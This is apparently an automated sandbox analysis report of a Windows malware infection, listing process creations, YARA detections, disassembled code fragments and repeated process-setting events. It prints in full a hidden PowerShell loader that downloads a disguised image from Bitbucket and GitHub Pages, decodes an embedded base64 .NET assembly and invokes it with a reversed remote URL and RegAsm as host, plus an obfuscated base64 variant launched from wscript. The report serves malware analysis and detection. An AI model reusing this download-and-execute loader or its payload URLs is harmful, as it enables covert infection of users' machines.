                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 7.2.RegAsm.exe.3f95570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegAsm.exe.54a0000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2615795647.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1432, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC640327 pushad ; ret 2_2_00007FFAAC640346
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC6412FD push es; ret 2_2_00007FFAAC641316
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC640108 push ds; ret 2_2_00007FFAAC6401B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC6400BD pushad ; iretd 2_2_00007FFAAC6400C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC6411A7 push es; ret 2_2_00007FFAAC641316
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC64018D push ds; ret 2_2_00007FFAAC6401B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC640347 push esi; ret 2_2_00007FFAAC640376
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC640415 push esi; ret 2_2_00007FFAAC640416
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02D74812 pushfd ; iretd 7_2_02D74821
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0576D004 push edx; iretd 7_2_0576D00D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_05769BE1 push 8B05769Eh; iretd 7_2_05769C5E
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, L6j7a2k3TmQjt0GHQ4.csHigh entropy of concatenated method names: 'ptcKgDZ6A', 'TYlqG4Y3Q', 'ablo28gZf', 'vlraIh8kU', 'Oe6ic3yJY', 'zIP09Shfr', 'zgME3KJ1G', 'pjYQR7JTw', 'iBKZRCOWT', 'wfODOspvojvsQ3EFLCZ'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, LgU3ZivqUV3r7RL9fo.csHigh entropy of concatenated method names: 'ku3VaO5No', 'ijOef1xAR', 'ITtfJPq14', 'TU5y2nps9', 'pVeHQNn8p', 'KWqxyuPaS', 'ly0p2K4b2', 'S3dgJd77B', 'OLbWOaJDJ', 'nikPtDbk1'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, w0gUvjn1pmlF6l1K21B.csHigh entropy of concatenated method names: 'WBOqGFWrssOB3dv6e5I', 'HhTPVGWOsT7beLgPbGp', 'LU3dbKsgAc', 'vh0ry9Sq2v', 'HuMdkoer01', 'aLkdLvV3vC', 'wi4dKSNCIu', 'Lv8dqGmm8t', 'vuFerT55aM', 'emcnnilbTF'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, ceI1TO5w0CZjAK5Q8IC.csHigh entropy of concatenated method names: 'v7c5jV9m03', 'yt75rMi6wm', 'uas5Or9rXm', 'Rne5MaTiLt', 'p2y54O1wxF', 'jjR5vrXnrm', 'hAW5AWHm2l', 'pGh5HTTdqN', 'MOX5x33XBl', 'lpR5p9D2eM'
                Source: 7.2.RegAsm.exe.4125ac8.7.raw.unpack, GaIFs45gtG5cwTqScn0.csHigh entropy of concatenated method names: 's3MOrj19th', 'PHoOOp4Qwf', 'IxEOMjtP45', 'S4IO4ATVS6', 'E0aOvFChqP', 'F8vOAHJRAX', 'ioCOHt2EDp', 'ucd5qhAABS', 'eZJOxxZWii', 'DQsOp192jH'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, L6j7a2k3TmQjt0GHQ4.csHigh entropy of concatenated method names: 'ptcKgDZ6A', 'TYlqG4Y3Q', 'ablo28gZf', 'vlraIh8kU', 'Oe6ic3yJY', 'zIP09Shfr', 'zgME3KJ1G', 'pjYQR7JTw', 'iBKZRCOWT', 'wfODOspvojvsQ3EFLCZ'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, LgU3ZivqUV3r7RL9fo.csHigh entropy of concatenated method names: 'ku3VaO5No', 'ijOef1xAR', 'ITtfJPq14', 'TU5y2nps9', 'pVeHQNn8p', 'KWqxyuPaS', 'ly0p2K4b2', 'S3dgJd77B', 'OLbWOaJDJ', 'nikPtDbk1'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, w0gUvjn1pmlF6l1K21B.csHigh entropy of concatenated method names: 'WBOqGFWrssOB3dv6e5I', 'HhTPVGWOsT7beLgPbGp', 'LU3dbKsgAc', 'vh0ry9Sq2v', 'HuMdkoer01', 'aLkdLvV3vC', 'wi4dKSNCIu', 'Lv8dqGmm8t', 'vuFerT55aM', 'emcnnilbTF'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, ceI1TO5w0CZjAK5Q8IC.csHigh entropy of concatenated method names: 'v7c5jV9m03', 'yt75rMi6wm', 'uas5Or9rXm', 'Rne5MaTiLt', 'p2y54O1wxF', 'jjR5vrXnrm', 'hAW5AWHm2l', 'pGh5HTTdqN', 'MOX5x33XBl', 'lpR5p9D2eM'
                Source: 7.2.RegAsm.exe.4205b28.5.raw.unpack, GaIFs45gtG5cwTqScn0.csHigh entropy of concatenated method names: 's3MOrj19th', 'PHoOOp4Qwf', 'IxEOMjtP45', 'S4IO4ATVS6', 'E0aOvFChqP', 'F8vOAHJRAX', 'ioCOHt2EDp', 'ucd5qhAABS', 'eZJOxxZWii', 'DQsOp192jH'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
